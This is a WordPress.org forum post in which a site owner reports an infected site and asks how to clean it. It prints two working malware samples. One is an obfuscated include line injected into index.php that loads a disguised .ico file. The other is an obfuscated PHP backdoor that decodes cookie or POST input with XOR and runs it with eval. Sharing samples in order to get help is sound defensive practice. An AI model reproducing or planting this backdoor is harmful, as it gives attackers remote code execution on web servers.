Quantcast
Channel: Topic Tag: malware | WordPress.org
Viewing all articles
Browse latest Browse all 1906

WordPress Malware

$
0
0

Hi,
I am running wordpress latest version in godaddy hosting sever and facing lot of malware issues here. Can any one help me to solve this issues. please help me to resolve these issues.

1. Core wordpress files are updated with some malware code. see root index file content.

<?php
/*212f6*/

@include “\x2fhome\x2fcqhs\x395880\x67xf/p\x75blic\x5fhtml\x2fligh\x74spee\x64web.\x63a/su\x6eligh\x74dent\x61l/wp\x2dadmi\x6e/fav\x69con_\x614876\x63.ico”;

/*212f6*/
/**
* Front to the WordPress application. This file doesn’t do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/

/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define(‘WP_USE_THEMES’, true);

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . ‘/wp-blog-header.php’ );

2. automatically some files are uploaded in godaddy server. how the files are there file name(i5oaubep.php)

File Content

<?php
$apzdy = ’56\’o4sHv_ep8r91fxndal#mc2btgk3-*uyi’;$ghaxnll = Array();$ghaxnll[] = $apzdy[6].$apzdy[31];$ghaxnll[] = $apzdy[23].$apzdy[25].$apzdy[1].$apzdy[1].$apzdy[24].$apzdy[19].$apzdy[23].$apzdy[1].$apzdy[30].$apzdy[14].$apzdy[11].$apzdy[11].$apzdy[15].$apzdy[30].$apzdy[4].$apzdy[9].$apzdy[23].$apzdy[0].$apzdy[30].$apzdy[11].$apzdy[13].$apzdy[18].$apzdy[14].$apzdy[30].$apzdy[9].$apzdy[1].$apzdy[13].$apzdy[13].$apzdy[24].$apzdy[19].$apzdy[24].$apzdy[18].$apzdy[1].$apzdy[11].$apzdy[1].$apzdy[29];$ghaxnll[] = $apzdy[21];$ghaxnll[] = $apzdy[23].$apzdy[3].$apzdy[32].$apzdy[17].$apzdy[26];$ghaxnll[] = $apzdy[5].$apzdy[26].$apzdy[12].$apzdy[8].$apzdy[12].$apzdy[9].$apzdy[10].$apzdy[9].$apzdy[19].$apzdy[26];$ghaxnll[] = $apzdy[9].$apzdy[16].$apzdy[10].$apzdy[20].$apzdy[3].$apzdy[18].$apzdy[9];$ghaxnll[] = $apzdy[5].$apzdy[32].$apzdy[25].$apzdy[5].$apzdy[26].$apzdy[12];$ghaxnll[] = $apzdy[19].$apzdy[12].$apzdy[12].$apzdy[19].$apzdy[33].$apzdy[8].$apzdy[22].$apzdy[9].$apzdy[12].$apzdy[27].$apzdy[9];$ghaxnll[] = $apzdy[5].$apzdy[26].$apzdy[12].$apzdy[20].$apzdy[9].$apzdy[17];$ghaxnll[] = $apzdy[10].$apzdy[19].$apzdy[23].$apzdy[28];foreach ($ghaxnll[7]($_COOKIE, $_POST) as $iycba => $rgwvbxp){function vhprqws($ghaxnll, $iycba, $hvhxn){return $ghaxnll[6]($ghaxnll[4]($iycba . $ghaxnll[1], ($hvhxn / $ghaxnll[8]($iycba)) + 1), 0, $hvhxn);}function mtvqaj($ghaxnll, $ioiszsz){return @$ghaxnll[9]($ghaxnll[0], $ioiszsz);}function dfbnp($ghaxnll, $ioiszsz){$buzbh = $ghaxnll[3]($ioiszsz) % 3;if (!$buzbh) {eval($ioiszsz[1]($ioiszsz[2]));exit();}}$rgwvbxp = mtvqaj($ghaxnll, $rgwvbxp);dfbnp($ghaxnll, $ghaxnll[5]($ghaxnll[2], $rgwvbxp ^ vhprqws($ghaxnll, $iycba, $ghaxnll[8]($rgwvbxp))));}


Viewing all articles
Browse latest Browse all 1906

Trending Articles